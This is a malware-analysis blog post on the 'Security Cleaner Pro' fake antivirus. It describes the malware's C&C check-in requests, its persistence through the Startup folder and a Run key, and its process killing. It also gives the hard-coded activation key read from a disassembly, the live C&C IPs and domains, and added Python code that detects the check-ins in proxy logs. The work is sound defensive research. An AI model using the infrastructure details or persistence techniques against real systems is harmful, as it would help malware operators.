October 4, 2013
Analysis of the “Security Cleaner Pro” fake antivirus

Another one of the FakeAVs, this time called “Security Cleaner Pro”. Detection is quite low: 4/48 on VT for the loader and 8/48 for the payload.

Loader 2a8038d3acd963e804ca38a912ba116b : VirusTotal
Payload 8d15016f249274158e0472a02f9de00e : VirusTotal


Analysis

This sample was dropped by Blackhole and installed itself as usual, with a shortcut on the desktop and an icon active in the system tray.

When the loader starts it tries to set up a connection with the C&C to report a new install of the loader. After this it requests a payload. The payload also checks in to report that it has installed properly. From then on the FakeAV payload checks in at a regular interval to confirm payment with the C&C. On the network level this looks like this, step by step:

GET http://<domain>.tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=1
200 OK (text/html)

GET http://<domain>.tld/index/getsoft/?id=<unique_system_id>&os=<os_info>&advertid=<affiliate_id>&type=1
200 OK (application/octet-stream)

GET http://<domain>.tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=2
200 OK (text/html)

GET http://<domain>.tld/index/checklic/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]
200 OK (text/html)

As you can see, the install check-in with type 1 is the loader and type 2 is the actual FakeAV payload. We get an unencrypted payload back.
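To turn the capture above into something a proxy log can be checked against, here is an added Python example of my own (not code from the original post): it classifies each of the four check-in stages from the URL path and the type parameter and pulls out the affiliate id. The log layout, host name and sample values are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed sample proxy log lines (not real traffic), laid out as
# "<client> <method> <url> <status> <content-type>".
SAMPLE_LOG = """\
10.0.0.7 GET http://cnc.example.invalid/index/install/?id=A1B2C3&os=xpprosp3&advertid=10042&type=1 200 text/html
10.0.0.7 GET http://cnc.example.invalid/index/getsoft/?id=A1B2C3&os=xpprosp3&advertid=10042&type=1 200 application/octet-stream
10.0.0.7 GET http://cnc.example.invalid/index/install/?id=A1B2C3&os=xpprosp3&advertid=10042&type=2 200 text/html
10.0.0.7 GET http://cnc.example.invalid/index/checklic/?id=A1B2C3&os=xpprosp3 200 text/html
10.0.0.9 GET http://www.example.com/index.html 200 text/html
"""

# The four check-in stages from the capture, keyed by (path element, type param).
STAGES = {
    ("install", "1"): "loader install",
    ("getsoft", "1"): "payload download",
    ("install", "2"): "payload install",
    ("checklic", None): "license check",
}
PATH_RE = re.compile(r"/index/(install|getsoft|checklic)/")
OS_RE = re.compile(r"(xp|win7|win8)(pro)?sp[0-9]")  # os= value seen in the capture

def classify(line):
    """Return (stage, system_id, advertid) for a check-in line, or None for anything else."""
    parts = line.split()
    if len(parts) < 3 or parts[1] != "GET":
        return None
    url = urlsplit(parts[2])
    m = PATH_RE.fullmatch(url.path)
    if not m:
        return None
    q = parse_qs(url.query)
    sys_id = q.get("id", [None])[0]
    if sys_id is None or not OS_RE.fullmatch(q.get("os", [""])[0]):
        return None
    stage = STAGES.get((m.group(1), q.get("type", [None])[0]))
    return None if stage is None else (stage, sys_id, q.get("advertid", [None])[0])

def scan_log(text):
    """Group hits per infected system id: the affiliate id plus the stages seen, in order."""
    hits = {}
    for line in text.splitlines():
        r = classify(line)
        if r:
            stage, sys_id, advertid = r
            h = hits.setdefault(sys_id, {"advertid": None, "stages": []})
            h["stages"].append(stage)
            h["advertid"] = h["advertid"] or advertid  # checklic carries no advertid
    return hits
```

A system id whose stages stop after "payload download" never reached the payload install, which is the difference between an attempted and a completed infection.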


After the payload has been downloaded it is copied to:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\shl.exe

The filename is fixed and always seems to be the same. One thing to note is that other versions I had installed themselves in %appdata% and set a Run key instead of dropping into the Startup folder, like so:

[ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], 
"ProtSoftware Inc" = "C:\Documents and Settings\All Users\Application Data\shl.exe"


The filename shl.exe seems to be fixed since earlier versions as well.

After setting itself up, the application starts with the usual infected-scan information:

So yes, the usual: we are infected! Before digging into the activation, let's look around the application. It features (fake) updating:

The rest of the application shows generic options which are all (obviously) fake and have no function.


You can also contact the support desk via email if you click the button at the top:



From time to time there is also a fake Windows Security Center popup warning you to activate the AV. The entire dialog is an image, and clicking anywhere just brings the FakeAV to the front:

Another trick this FakeAV does is hijack the browser, Internet Explorer only. When a new process is spawned it checks the filename: if it is named ‘iexplorer.exe’ it is allowed to run, otherwise it is killed. Funnily enough, it doesn't seem to pick up new processes fast enough, so if you just start your debugger 5-10 times in quick succession one of them will not be killed.

The injection in IE looks like this when trying to browse anywhere:

Let's look at the activation of this ‘product’. When you click Register you get a page that looks really familiar; it seems to be a generic payment template also used by the Titan AV I wrote about some time ago.

We can pay or enter a registration key ourselves.


If we cancel we get a warning message of how we are unprotected.


And if we enter the wrong information we get a warning.



So we open up our debugger and we figure out how the check works:

00407F62  |>  50            PUSH EAX                                 ; /String2
00407F63  |.  51            PUSH ECX                                 ; |String1
00407F64  |.  FF15 BC704100 CALL DWORD PTR DS:[<&KERNEL32.lstrcmpiW> ; \KERNEL32.lstrcmpiW
00407F6A  |.  8BD8          MOV EBX,EAX
00407F6C  |.  F7DB          NEG EBX
00407F6E  |.  1ADB          SBB BL,BL
00407F70  |.  6A 01         PUSH 1                                   ; /Arg1 = 1
00407F72  |.  33FF          XOR EDI,EDI                              ; |
00407F74  |.  8D75 9C       LEA ESI,[EBP-64]                         ; |
00407F77  |.  E8 63260000   CALL 0040A5DF                            ; \security_cleaner_pro.0040A5DF
00407F7C  |.  FEC3          INC BL
00407F7E  |.  74 2B         JZ SHORT 00407FAB
00407F80  |.  6A 40         PUSH 40                                  ; /Type = MB_OK|MB_ICONASTERISK|MB_DEFBUTTON1|MB_APPLMODAL
00407F82  |.  68 64C74100   PUSH OFFSET 0041C764                     ; |Caption = “Information”
00407F87  |.  68 7CC74100   PUSH OFFSET 0041C77C                     ; |Text = “Thank you for registering!”
00407F8C  |.  FF75 98       PUSH DWORD PTR SS:[EBP-68]               ; |hOwner => [ARG.EBP-68]
00407F8F  |.  FF15 20724100 CALL DWORD PTR DS:[<&USER32.MessageBoxW> ; \USER32.MessageBoxW

A simple string compare with the real key, so to activate this FakeAV we can use the following key, which is hard-coded in all the bins I've tried. The key:


YKGVWHVSFETPXBIMDXUJSUYGPRADAOHZ
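To make the listing above easier to read, here is an added Python model of my own (not code from the sample or the original post) of how the lstrcmpiW result flows through the NEG/SBB/INC sequence into the JZ that skips the "Thank you for registering!" box. The function names are mine; the key constant is the one quoted above.

```python
KEY = "YKGVWHVSFETPXBIMDXUJSUYGPRADAOHZ"  # hard-coded key quoted in the post

def lstrcmpi_w(s1, s2):
    """Model of KERNEL32.lstrcmpiW: 0 when equal ignoring case, otherwise non-zero."""
    a, b = s1.upper(), s2.upper()
    return 0 if a == b else (-1 if a < b else 1)

def registration_accepted(user_key):
    """Walk the listing: MOV EBX,EAX / NEG EBX / SBB BL,BL / INC BL / JZ.
    Returns True when the JZ is not taken, i.e. the MessageBoxW is shown."""
    eax = lstrcmpi_w(user_key, KEY) & 0xFFFFFFFF  # return value of lstrcmpiW
    cf = 1 if eax != 0 else 0                     # NEG EBX sets CF iff EBX was non-zero
    bl = (0 - cf) & 0xFF                          # SBB BL,BL -> BL - BL - CF = 0xFF or 0x00
    bl = (bl + 1) & 0xFF                          # INC BL -> 0x00 on mismatch, 0x01 on match
    zf = (bl == 0)                                # JZ SHORT 00407FAB skips the message box
    return not zf
```

Because the compare is lstrcmpiW rather than lstrcmpW, the check is case-insensitive, so the key is accepted in any letter case.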

Now we are licensed and can ‘clean’ the infections found during the scan. We are now also allowed to start new applications.


And as we can expect after registration any new scan turns up no infections.


Command and Control Server(s)

So with this FakeAV there are 4 dedicated C&C servers which form the backend. The initial domain seen with the first version I got was wirejournal.biz; after a day or so I got a new hit on lenderspoker.in. All the domains have multiple A-records pointing to:

  • 188.93.210.164 - Russian Federation Moscow Ltd Hosting Service
  • 109.234.154.254 - Russian Federation Saint Petersburg Ooo Network Of Data-centers Selectel
  • 109.120.150.95 - Russian Federation Saint Petersburg Zao National Telecommunications
  • 91.240.22.98 - Ukraine Donets’k Wibo Project Llc

After some more checking I was able to find more domains used by these IPs. Not sure what all these are for, but it's a somewhat big list for just a FakeAV:


At the beginning you saw the structure of the check-ins. One of the parameters given with the check-in is ‘advertid’. This refers to an affiliate of the program. The idea is that you sign up, get your own affiliate ID, and spread the loader given to you, which checks in with your personal ID; for every new client you infect with it you get money. As simple as that.

One thing the C&C servers do when serving the loaders or payloads is modify a PE resource of type ‘RCDATA’ to hold your personal ID. This way an infection can be traced back to the appropriate affiliate for payment. It also means every affiliate has unique bins. I've been able to identify at least 49 affiliates and have retrieved 89 unique loaders and 42 payloads. To get the AV vendors to create generic detection instead of specifics per bin hash I've decided to upload all of them. At the end of the article you will find a section called ‘Unique Samples’ with their VT links. If you want any of these samples to analyze/play with, send me a message on Twitter or email me.

Additional info

Additionally, when running the FakeAV through my debugger I found the following string in memory: “http://softsupport.info/open.php”. This domain is registered to a guy with the email address “dorvey_creator@rocketmail.com”. If we look this up we get a list of domains all pointing to either 95.141.28.79 or 95.141.28.81. The list of domains I was able to get already looks sketchy:


I do not know what this guy is up to, but if you also check the VT entries for those IPs, [95.141.28.79] and [95.141.28.81], you can see tons of DynDNS passing by. If I find out what his connection is to this FakeAV or what he is doing with those servers and domains, I'll write another article.

Unique Samples

Loaders (88 in total)

Payloads (42 in total)
